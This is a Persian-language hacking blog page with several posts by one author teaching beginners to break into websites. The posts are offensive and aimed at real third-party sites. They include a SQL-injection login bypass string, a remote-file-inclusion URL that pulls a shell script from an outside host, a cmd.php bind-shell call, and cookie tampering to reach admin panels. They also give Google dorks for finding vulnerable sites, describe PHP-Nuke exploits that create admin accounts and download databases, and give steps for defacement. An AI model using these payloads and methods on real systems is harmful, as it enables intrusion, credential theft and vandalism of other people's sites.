کافیست که کمی لینوکس بلد باشین میتونین راحت ترمینال سایت رو زیر دست بگیرید و هک کنید . www.victim.com/cmd.php?cmd=./bind |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 22:52 توسط مهدی |
|
|
در این مقاله شما عزیزان با نحوه هک کردن سایت هایی که آخرشان login.asp دارند آشنا میشوید . |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 22:51 توسط مهدی |
|
|
اول باید وب سایت های php. رو پیدا کنید . خب حالا بیاین و جلوی عبارت سایت عبارت زیر رو اضافه کنید . مثلا سایت قربانی این هست : www.myhack.tk/index.php خب حالا میشه مثل زیر : www.myhack.tk/index.php/username='/*&password=*/%20AND%201=0%20UNION%20SELECT%20999 /*یعنی باید عبارت : username='/*&password=*/%20AND%201=0%20UNION%20SELECT%20999/*رو جلوش اضافه کنید . حالا میتونید به جای Admin سایت به سرور نفوذ کنید |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 22:49 توسط مهدی |
|
|
ابتدا یک وب سایت که از سرور آپاچی استفاده میکند رو پیدا کرده . برای مثال آدرس وب سایت مثل رو به رو هستش : www.myhack.Tkخب حالا مثلا میخواین از این دامین ( که سرور آپاچی هست ) شل بگیرین . عبارت زیر رو که توش کد های شل گیری هست اضافه میکنید : http://myhack.blogfa.com/AppacheShell.txtیعنی مثل این میشه : www.myhack.Tk/http://myhack.blogfa.com/AppacheShell.txt نکته مهم : شما باید در عبارت بالا به جای myhack.Tk اسم سایت خودتون با پسوندشو بنویسید .به همین راحتی میتونید سایت هک کنید . حالا باید برای شما توی مرورگر کد های اصلی و مشخصات وب سایت ظاهر بشه . حالا وب رو اسکن کنید و بعدش هم دیفیس |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 22:45 توسط مهدی |
|
|
برای این کار حتما باید مرورگر اپرا رو نصب کرده باشید . وقتی نصب کردید شروع کنید. ابتدا یک وب سایت که وی گروپ هست رو پیدا کنید . ( برای مشاهده نحوه پیدا کردن وب گروپ ها به آخر پست مراجعه کنید ) خب بعد از اینکه پیدا کردید باید برای خودتون توی اون بو سایت یک اکانت بوجود بیارین . برین و یک اکانت رایگان درست کنید و سپس با با همون اکانت لاگین کنید . حالا از منوی بالای مرورگر اپرا مسر زیر را دنبال کنید Tools >> Advanced >> Coockies حالا سایتی که الان آدرس توی آدرس بار اپرا افتاده رو ببینید و سپس همون آدرس رو توی منویی که باز شده پیدا کنید و روش دبل کلیک کنید . حالا میبینید که یک سری آدرس دیگه زیر اون لینک باز شدش . سپس روی لینک دقیق اون آدرسی که توشیش کلیک کنید و تمام کد هایی که در قسمت ویول نوشته شده است را پاک کنید و کد هایی که در آخر همین پست لینک انلودشو توی نوتپد گذاشتم رو جانشین این کد ها در ویول کنید . حالا خارج شین و یک بار صفحه رو ریفرش کنید . میبنید که پایین صفحه یک عبارت با هنوان Go To Administrator Panle اومده . حالا اون رو بزنید و به پنل ادمین برین !!! و بعدش هر کاری که خواستید با اون سایت بکنید . فقط یادتون باشه فقط روی مرور گر اپرا جواب میده این روش خیلی جالب . برای پیدا کردن وب گروپ ها توی گوگل عبارت : Powerd By : WebGroups یا Webgroups Sign Up و یا : Webgroups را سرچ کنید.کد هایی که باید جای Vauvle ( ویول ) جاگذاری کنید رو تو لینک زیر مشاهده کنید :http://arianhaacker.persiangig.com/TextExploits/WebgroupsExploit.txt |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 17:53 توسط مهدی |
|
|
اون برنامه شما بهش اسم سایت رو میدادین و میامد براتون یک User و Pass ادمین ایجاد میکردش و شما با اون Login میکردید . اما برنامه امروز فرق میکنه . این برنامه میاد وقتی شما بهش آدرس سایت رو میدید وارد " Panl " ادمین وب سایت میشه و یوزر و پسورد رو کش میره و برای ما در خود برنامه به نمایش میگذارهحالا اول بگم که روی چه سایت های Support میشه . این برنامه روی سایت هایی ساپورت میشه که از فرون Zix استفاده میکنند . البته باگ یکم قدیمی هست اما خیلی از سایت ها هستند که هنوز این باگ رو Patch نکردند .خب حالا نوبت به عبارت سروچ و شکل سایت ها میرسه . خب شکل سایت ها مثل زیر هستش : www.Victim.Com/Main.asp با این عبارت شه چند تا سایت پیدا کرد Inurl:/Main.asp |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 17:52 توسط مهدی |
|
|
امروز هم با یک آموزش نسباتا جالب در موضوع آموزش هک سایت در خدمت شما هستیم امروز هم با یک آموزش نسباتا جالب در موضوع آموزش هک سایت در خدمت شما هستیم . امروز شما یاد میگیرن که چجوری به راحتی بیاین و یک سایت که از PHP-MOUDLE استفاده میکنه رو هک کنید . خب عبارت سرچ رو که همه میدونند Google Search ====> modules.php?name=Downloads عد از این که سرچ کردید یک سایت رو باز کنید . حالا میتونید از لینکی که آخر همین پست گذاشتم چند تا اکسپلیوت جدید کشف شده در این حفره ها را مشاهده کنید . اکسپلیوت ها رو دونه به دونه توضیح میدم کسپلیوت شماره 1 تایتل هوم پیج رو عوض میکنه . اون اکسپلیوتی که روی دیفالت من توی تکست قرار تایتل رو به Hacked By Arian-Hacker تغییر میده . شما باید عوضش کنید .اکسپلیوت شماره 2 برای شما یک یوزر ادمین با پسوردی که خودتون میخواین اسجاد میکنه . این اکسپلیوت روی دیفالت یوزر ArianHacker و پسورد ARIANHACKER را ایجاد میکنه .اکسپلیوت شماره 3 فایل دیتابیس وب سایت رو که دارای تمام مشخصات هست و دانلود میکنه که شما باید اون رو با ماکروسافت ACCEC باز کنید . بینید .اکسپلیوت شماره 4 هم که بسیار مهم هستش و خیلی کاربرد داره شما رو هم به شل میرسونه و هم به دایرکتوری سایت میبره که میتونین توی دایرکتوری فایل آپلود کنید . روش استفاده از این اکسپلیوت ها به این صورت میباشد که شما باید این Exploit ها رو جلوی Home page وب سایت اصلی قرار بدید .اکسپلیوت ها میتونید از این لینک دانلود کنید : |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 17:51 توسط مهدی |
|
|
Scan کردن Web Siteاسکن کردن وب سایت باید با برنامه های وب سایت اسکنر انجام گیرد . در این مرحله شما میتوانید با کمک گرفتن از برنامه باگ ها و حفره های نفوذ و آسیب پذیر یک سایت رو پیدا کنید که راه و روش نغوذ را بیابید پیدا کردن و یا نوشتن Exploit و یا یافتن راه نفوذراحت بگم که این مرحله حساس ترین مرحله هک سایت هستش . برای این که شما توی مرحله اول میاین و یک حفره توی سایت پیدا میکنید . حالا نیاز به یک روش نفوذ دارید که بتونین به سایت نفوذ کنید . بهترین روش نفوذ به این طور سایت ها Expolit ها هستند . هر Expolit برای یک حفره طراحی میشود . حالا اگر حفره سایت قربانی شما نیاز به Expolit داشته باشد یا باید آن را دانلود کنید و یا باید خودتان با .net# بنویسید . خب حالا به فرض که امنیت سایت این قدر پایین بود که اصلا نیاز به اکسپلیوت نداشت .خب حالا باید یک جوری به دیتابیس ( به فایلی که همیشه در پشت وب سایت آپلود شده و حاوی تمام مشخصات و همچنین یوزر و پسورد ادمین وب میباشد میگویند ) سایت دسترسی پیدا کنید که مثلا اگر یادتون باشه یک روش برای هک سایت های نیوز بود که با عبارت new.mdbمیشد دیتابیس رو دانلود کرد و سایت رو هک کرد.دیفیس کردن به طور کلی مفهوم اصطلاح Deface ( دیفیس ) جا گذاری صفحه مورد نظر به جای هوم پیج سایت هستش که مثلا وقتی میرید میبینید یک صفحه نشون میده نوشته Hacked By Folan Hacker اون فلان هکر سایت رو دیفیس کرده و صفحه دیفیس خودش رو جای هوم پیج قرار داده . مثلا برای هک وبلاگ هم شما نیاز به ک صفحه دیفیس دارید که باید HTML بلد باشید . |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 17:50 توسط مهدی |
|
|
صفحه نخست پست الکترونیک آرشیو وبلاگ عناوین مطالب وبلاگ |
| درباره وبلاگ |
|
|
| نوشته های پیشین |
|
آذر 1386 مهر 1385 |
| پیوندها |
|
آموزش فوق حرفه ای وی}وال بیسیک توسط خودم |
|
RSS
|